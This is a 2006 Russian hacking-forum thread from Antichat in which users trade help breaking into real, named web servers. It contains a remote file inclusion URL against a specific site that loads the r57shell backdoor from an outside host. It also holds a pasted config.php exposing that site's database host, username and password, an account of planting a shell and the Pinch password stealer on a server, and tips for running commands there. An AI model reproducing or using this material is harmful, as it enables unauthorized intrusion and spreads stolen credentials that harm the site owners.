ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Windows NT & Safe mode (php inj)
  #1  
Старый 11.07.2006, 15:10
Аватар для DaemoniZ
DaemoniZ
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме:
285050

Репутация: 16
По умолчанию Windows NT & Safe mode (php inj)

Ребят... Подскажите как ломать... Я даже php бэкдор залить немогу.

http://www.rtk.it/SQuery/lib/gore.php?libpath=http://rst.void.ru/download/r57shell.txt?

Пасиба =)
 
Ответить с цитированием

  #2  
Старый 11.07.2006, 16:16
Аватар для zyl
zyl
Познающий
Регистрация: 19.04.2006
Сообщений: 40
Провел на форуме:
2905481

Репутация: 47
Отправить сообщение для zyl с помощью ICQ
По умолчанию

Это по-моему не из той оперы
Здесь ошибка вида:
Fatal error: Class gore: Cannot inherit from undefined class gamespy in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 8

А для загрузки шелла нужно чтобы была:
Warning: main(libpat): failed to open stream: No such file or directory in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 13
Warning: main(libpat): Failed opening 'libpat' for inclusion (include_path='.;/usr/local/php/PEAR') in D:\Inetpub\webs\rtkit\SQuery\lib\gore.php on line 1

Может там какая то переменная висела

Последний раз редактировалось zyl; 11.07.2006 в 16:45..
 
Ответить с цитированием

  #3  
Старый 11.07.2006, 20:17
Аватар для DaemoniZ
DaemoniZ
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме:
285050

Репутация: 16
По умолчанию

Хммм... А обойти-то можно как-нибудь? Что меня достаточно сильно удивило - я не могу нормально ползать по папкам.
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
 
Ответить с цитированием

  #4  
Старый 11.07.2006, 21:29
Аватар для zyl
zyl
Познающий
Регистрация: 19.04.2006
Сообщений: 40
Провел на форуме:
2905481

Репутация: 47
Отправить сообщение для zyl с помощью ICQ
По умолчанию

Цитата:
Хммм... А обойти-то можно как-нибудь?
Возможно что ошибаюсь, но по моему нет.

Цитата:
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет?
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php
 
Ответить с цитированием

  #5  
Старый 12.07.2006, 00:13
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Я как то читал про обход safe_mod но там жопа полная. Единсвенное чё можно пока сделать, так это читать любый файлы...(с помощью php_eval). Вот например небольшой кусок из config.php :
$dbhost = "62.149.150.56";
$dbuname = "Sql103994";
$dbpass = "41ebe44d";
$dbname = "Sql103994_1";
$prefix = "nuke";
$user_prefix = "nuke";
$dbtype = "MySQL";
$sitekey = "S·kQg*ит?^м#@и+~ю-?4Sd5%W@Y6Ђ7“ю2-dm29-.-39.3a8sUf+W9";
$gfx_chk = 7;
$subscription_url = "";
$admin_file = "admin";
$tipath = "images/topics/";
$advanced_editor = 0;
$display_errors = false;
 
Ответить с цитированием

  #6  
Старый 12.07.2006, 01:11
Аватар для DaemoniZ
DaemoniZ
Познающий
Регистрация: 09.01.2006
Сообщений: 53
Провел на форуме:
285050

Репутация: 16
По умолчанию

Цитата:
Сообщение от Dr.Check  
Я как то читал про обход safe_mod но там жопа полная.[/I]
Да это действительно так. Дело все в том, что я даже не знаю как ломать. Хотелось-бы бэкдор залить (просто php файлик как-нить изменить) но вот понять не могу, где я могу писать, а где - нет.

Цитата:
Сообщение от zyl  
Тут немного о них написанно:
_http://www.diwaxx.ru/web/chmod.php
Это про chmod. Он в *.nix системах, а в моем случае NT.
 
Ответить с цитированием

  #7  
Старый 08.08.2006, 12:59
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

У меня анологичное ситуация (( Свервак под NT залил шелл + пинч на комп а вот команда C:\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
 
Ответить с цитированием

  #8  
Старый 08.08.2006, 14:52
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Цитата:
У меня анологичное ситуация (( Свервак под NT залил шелл пинч на комп а вот команда C:\\x.exe не выполняется никак не катит там какая то защита не пойму что но сейф мод в моем случие офф
Конечно не отвечаю, что выйдет, но попробуй так:
C:\\ start [путь] x.exe
[путь] до файла...если в этой же дире, то не надо...
 
Ответить с цитированием

  #9  
Старый 08.08.2006, 19:24
Аватар для hidden
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию

Цитата:
Сообщение от DaemoniZ  
Еще вопрос. Как мне узнать имею-ли я права на запись в файл или нет? (nfm или другое не предлагать. Люблю rst =))
Попробуй второй пример в "выполнить пхп код" вставить отсюда fileperms
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Определиние Ip Dimann Болталка 18 09.06.2008 01:06
Windows Vista - "Новые возможности" от Microsoft Hitman_2 Мировые новости 0 28.03.2006 01:31
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ